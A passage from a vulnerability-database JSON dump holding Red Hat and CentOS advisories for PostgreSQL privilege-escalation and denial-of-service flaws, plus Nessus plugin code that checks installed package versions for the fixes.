RHSA-2008:0039 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nAll PostgreSQL users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. If you are running a\nPostgreSQL server, the postgresql service must be restarted for this update\nto take effect.", "modified": "2018-05-26T04:26:17", "published": "2009-10-07T04:00:00", "id": "RHSA-2009:1485", "href": "https://access.redhat.com/errata/RHSA-2009:1485", "type": "redhat", "title": "(RHSA-2009:1485) Moderate: postgresql security update", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:20", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3278", "CVE-2007-6600", "CVE-2007-6601"], "description": "PostgreSQL is an advanced Object-Relational database management system\r\n(DBMS). The postgresql packages include the client programs and libraries\r\nneeded to access a PostgreSQL DBMS server.\r\n\r\nA privilege escalation flaw was discovered in PostgreSQL. An authenticated\r\nattacker could create an index function that would be executed with\r\nadministrator privileges during database maintenance tasks, such as\r\ndatabase vacuuming. (CVE-2007-6600)\r\n\r\nA privilege escalation flaw was discovered in PostgreSQL's Database Link\r\nlibrary (dblink). An authenticated attacker could use dblink to possibly\r\nescalate privileges on systems with \"trust\" or \"ident\" authentication\r\nconfigured. Please note that dblink functionality is not enabled by\r\ndefault, and can only by enabled by a database administrator on systems\r\nwith the postgresql-contrib package installed.\r\n(CVE-2007-3278, CVE-2007-6601)\r\n\r\nAll postgresql users should upgrade to these updated packages, which\r\ninclude PostgreSQL 7.3.21 and resolve these issues.", "modified": "2017-07-28T18:43:54", "published": "2008-01-11T05:00:00", "id": "RHSA-2008:0039", "href": "https://access.redhat.com/errata/RHSA-2008:0039", "type": "redhat", "title": "(RHSA-2008:0039) Moderate: postgresql security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:24:22", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1484\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory RHSA-2008:0038 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion failure,\npossibly leading to a temporary denial of service. Note: To exploit this\nissue, a locale and client encoding for which specific messages fail to\ntranslate must be selected (the availability of these is determined by an\nadministrator-defined locale setting). (CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\nlist of changes:\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028221.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028222.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028310.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028312.html\n\n**Affected packages:**\npostgresql\npostgresql-contrib\npostgresql-debuginfo\npostgresql-devel\npostgresql-docs\npostgresql-jdbc\npostgresql-libs\npostgresql-pl\npostgresql-python\npostgresql-server\npostgresql-tcl\npostgresql-test\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2009-1484.html", "edition": 3, "modified": "2009-10-30T14:43:59", "published": "2009-10-09T15:00:55", "href": "http://lists.centos.org/pipermail/centos-announce/2009-October/028221.html", "id": "CESA-2009:1484", "title": "postgresql security update", "type": "centos", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:01", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600", "CVE-2009-3230"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1485\n\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory RHSA-2008:0039 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nAll PostgreSQL users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. If you are running a\nPostgreSQL server, the postgresql service must be restarted for this update\nto take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028217.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-October/028218.html\n\n**Affected packages:**\nrh-postgresql\nrh-postgresql-contrib\nrh-postgresql-devel\nrh-postgresql-docs\nrh-postgresql-jdbc\nrh-postgresql-libs\nrh-postgresql-pl\nrh-postgresql-python\nrh-postgresql-server\nrh-postgresql-tcl\nrh-postgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1485.html", "edition": 4, "modified": "2009-10-07T21:13:56", "published": "2009-10-07T21:13:30", "href": "http://lists.centos.org/pipermail/centos-announce/2009-October/028217.html", "id": "CESA-2009:1485", "title": "rh security update", "type": "centos", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:26:44", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600", "CVE-2007-3278", "CVE-2007-6601"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0039\n\n\nPostgreSQL is an advanced Object-Relational database management system\r\n(DBMS). The postgresql packages include the client programs and libraries\r\nneeded to access a PostgreSQL DBMS server.\r\n\r\nA privilege escalation flaw was discovered in PostgreSQL. An authenticated\r\nattacker could create an index function that would be executed with\r\nadministrator privileges during database maintenance tasks, such as\r\ndatabase vacuuming. (CVE-2007-6600)\r\n\r\nA privilege escalation flaw was discovered in PostgreSQL's Database Link\r\nlibrary (dblink). An authenticated attacker could use dblink to possibly\r\nescalate privileges on systems with \"trust\" or \"ident\" authentication\r\nconfigured. Please note that dblink functionality is not enabled by\r\ndefault, and can only by enabled by a database administrator on systems\r\nwith the postgresql-contrib package installed.\r\n(CVE-2007-3278, CVE-2007-6601)\r\n\r\nAll postgresql users should upgrade to these updated packages, which\r\ninclude PostgreSQL 7.3.21 and resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-January/026609.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-January/026610.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-January/026612.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-January/026617.html\n\n**Affected packages:**\nrh-postgresql\nrh-postgresql-contrib\nrh-postgresql-devel\nrh-postgresql-docs\nrh-postgresql-jdbc\nrh-postgresql-libs\nrh-postgresql-pl\nrh-postgresql-python\nrh-postgresql-server\nrh-postgresql-tcl\nrh-postgresql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0039.html", "edition": 4, "modified": "2008-01-11T17:14:36", "published": "2008-01-11T14:31:56", "href": "http://lists.centos.org/pipermail/centos-announce/2008-January/026609.html", "id": "CESA-2008:0039", "title": "rh security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-17T13:44:32", "description": "CVE-2009-0922 postgresql: potential DoS due to conversion functions\n\nCVE-2009-3230 postgresql: SQL privilege escalation, incomplete fix for\n\nCVE-2007-6600\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Scientific Linux did not include protection against misuse of\nthe RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that\nwould later execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Scientific Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Scientific Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes\nfor a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nIf the postgresql service is running, it will be automatically\nrestarted after installing this update.", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : postgresql on SL3.x, SL4.x, SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20091007_POSTGRESQL_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60675", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60675);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-6600\", \"CVE-2009-0922\", \"CVE-2009-3230\");\n\n script_name(english:\"Scientific Linux Security Update : postgresql on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2009-0922 postgresql: potential DoS due to conversion functions\n\nCVE-2009-3230 postgresql: SQL privilege escalation, incomplete fix for\n\nCVE-2007-6600\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Scientific Linux did not include protection against misuse of\nthe RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that\nwould later execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Scientific Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Scientific Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes\nfor a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nIf the postgresql service is running, it will be automatically\nrestarted after installing this update.\"\n );\n # http://www.postgresql.org/docs/7.4/static/release.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/docs/7.4/release.html\"\n );\n # http://www.postgresql.org/docs/8.1/static/release.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.postgresql.org/docs/8.1/release.html\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0910&L=scientific-linux-errata&T=0&P=928\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b0facadd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-contrib-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-devel-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-docs-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-jdbc-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-libs-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-pl-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-python-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-server-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-tcl-7.3.21-2\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"rh-postgresql-test-7.3.21-2\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"postgresql-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-contrib-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-devel-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-docs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-jdbc-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-libs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-pl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-python-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-server-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-tcl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"postgresql-test-7.4.26-1.el4_8.1\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"postgresql-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-contrib-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-devel-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-docs-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-libs-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-pl-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-python-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-server-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-tcl-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"postgresql-test-8.1.18-2.el5_4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:25:57", "description": "Updated postgresql packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Red Hat Security Advisory RHSA-2008:0038 did not include\nprotection against misuse of the RESET ROLE and RESET SESSION\nAUTHORIZATION commands. An authenticated user could use this flaw to\ninstall malicious code that would later execute with superuser\nprivileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL\nto version 7.4.26. For Red Hat Enterprise Linux 5, this update\nupgrades PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release\nNotes for a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.", "edition": 26, "published": "2010-01-06T00:00:00", "title": "CentOS 4 / 5 : postgresql (CESA-2009:1484)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "modified": "2010-01-06T00:00:00", "cpe": ["p-cpe:/a:centos:centos:postgresql-contrib", "p-cpe:/a:centos:centos:postgresql-docs", "p-cpe:/a:centos:centos:postgresql-server", "p-cpe:/a:centos:centos:postgresql-test", "p-cpe:/a:centos:centos:postgresql-pl", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:postgresql-tcl", "p-cpe:/a:centos:centos:postgresql", "p-cpe:/a:centos:centos:postgresql-jdbc", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:postgresql-libs", "p-cpe:/a:centos:centos:postgresql-devel", "p-cpe:/a:centos:centos:postgresql-python", "p-cpe:/a:centos:centos:postgresql-debuginfo"], "id": "CENTOS_RHSA-2009-1484.NASL", "href": "https://www.tenable.com/plugins/nessus/43800", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1484 and \n# CentOS Errata and Security Advisory 2009:1484 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43800);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-6600\", \"CVE-2009-0922\", \"CVE-2009-3230\");\n script_bugtraq_id(34090, 36314);\n script_xref(name:\"RHSA\", value:\"2009:1484\");\n\n script_name(english:\"CentOS 4 / 5 : postgresql (CESA-2009:1484)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated postgresql packages that fix two security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included\nin the Red Hat Security Advisory RHSA-2008:0038 did not include\nprotection against misuse of the RESET ROLE and RESET SESSION\nAUTHORIZATION commands. An authenticated user could use this flaw to\ninstall malicious code that would later execute with superuser\nprivileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion\nfailure, possibly leading to a temporary denial of service. Note: To\nexploit this issue, a locale and client encoding for which specific\nmessages fail to translate must be selected (the availability of these\nis determined by an administrator-defined locale setting).\n(CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL\nto version 7.4.26. For Red Hat Enterprise Linux 5, this update\nupgrades PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release\nNotes for a list of changes :\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016183.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4f8d751\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016184.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?359e7ac8\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016272.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46402491\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-October/016274.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1fc17d78\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:postgresql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-contrib-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-contrib-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-debuginfo-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-debuginfo-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-devel-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-devel-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-docs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-docs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-jdbc-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-jdbc-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-libs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-libs-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-pl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-pl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-python-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-python-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-server-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-server-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-tcl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-tcl-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"postgresql-test-7.4.26-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"postgresql-test-7.4.26-1.el4_8.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-contrib-8.1.18-2.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"postgresql-devel-8.1.18-2.el5_4.1\")) flag++;\nif 